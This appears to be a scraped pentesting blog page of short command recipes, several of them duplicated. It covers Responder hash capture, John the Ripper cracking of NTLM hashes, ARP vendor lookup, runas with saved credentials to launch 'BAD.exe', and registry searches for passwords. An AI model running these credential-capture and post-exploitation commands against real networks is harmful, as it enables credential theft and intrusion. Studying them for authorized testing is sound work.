cd /usr/share/responder/logs
john --format=netntlm SMB-NTLMv1-SSP-9.9.9.9.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --format=netntlmv2 SMB-NTLMv2-SSP-8.8.8.8.txt --wordlist=/usr/share/wordlists/rockyou.txt
Tuesday, October 22, 2019
Sample Responder command
responder -I eth0 -r -b
cd /usr/share/responder/logs
john --format=netntlm SMB-NTLMv1-SSP-9.9.9.9.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --format=netntlmv2 SMB-NTLMv2-SSP-8.8.8.8.txt --wordlist=/usr/share/wordlists/rockyou.txt
cd /usr/share/responder/logs
john --format=netntlm SMB-NTLMv1-SSP-9.9.9.9.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --format=netntlmv2 SMB-NTLMv2-SSP-8.8.8.8.txt --wordlist=/usr/share/wordlists/rockyou.txt
Friday, October 18, 2019
Print all Mac Address Vendors around you (Arp -a)
# print all mac address vendors around you (using arp table and this great python library https://pypi.org/project/mac-vendor-lookup/ )
import os
from mac_vendor_lookup import MacLookup
myCmd = os.popen("arp -a").read()
print(myCmd)
for line in myCmd.splitlines():
for item in line.split():
if "-" in item:
if "--" not in item:
try:
print(item + ": " + MacLookup().lookup(item))
except:
print(item + ": not found")
import os
from mac_vendor_lookup import MacLookup
myCmd = os.popen("arp -a").read()
print(myCmd)
for line in myCmd.splitlines():
for item in line.split():
if "-" in item:
if "--" not in item:
try:
print(item + ": " + MacLookup().lookup(item))
except:
print(item + ": not found")
View Stored Credentials and Runas
>cmdkey /list
Currently stored credentials:
....
runas /savecred /user:XXXX "c:\BAD.exe"
Currently stored credentials:
....
runas /savecred /user:XXXX "c:\BAD.exe"
Password Searching in Registry
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S
REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S
REG QUERY HKLM /F "password" /t REG_SZ /S
REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S
Get File Shares Exposed "net share"
>net share
Share name Resource Remark
-------------------------------------------------------------------------------
C$ C:\ Default share
IPC$ Remote IPC
print$ C:\WINDOWS\system32\spool\drivers Printer Drivers
ADMIN$ C:\WINDOWS Remote Admin
Share name Resource Remark
-------------------------------------------------------------------------------
C$ C:\ Default share
IPC$ Remote IPC
print$ C:\WINDOWS\system32\spool\drivers Printer Drivers
ADMIN$ C:\WINDOWS Remote Admin
Password Login Settings "net accounts"
>net accounts
Force user logoff how long after time expires?: Never
Minimum password age (days): 0
Maximum password age (days): 30
Minimum password length: 15
Length of password history maintained: 12
Lockout threshold: 3
Lockout duration (minutes): 45
Lockout observation window (minutes): 45
Computer role: WORKSTATION
Force user logoff how long after time expires?: Never
Minimum password age (days): 0
Maximum password age (days): 30
Minimum password length: 15
Length of password history maintained: 12
Lockout threshold: 3
Lockout duration (minutes): 45
Lockout observation window (minutes): 45
Computer role: WORKSTATION
Subscribe to:
Posts (Atom)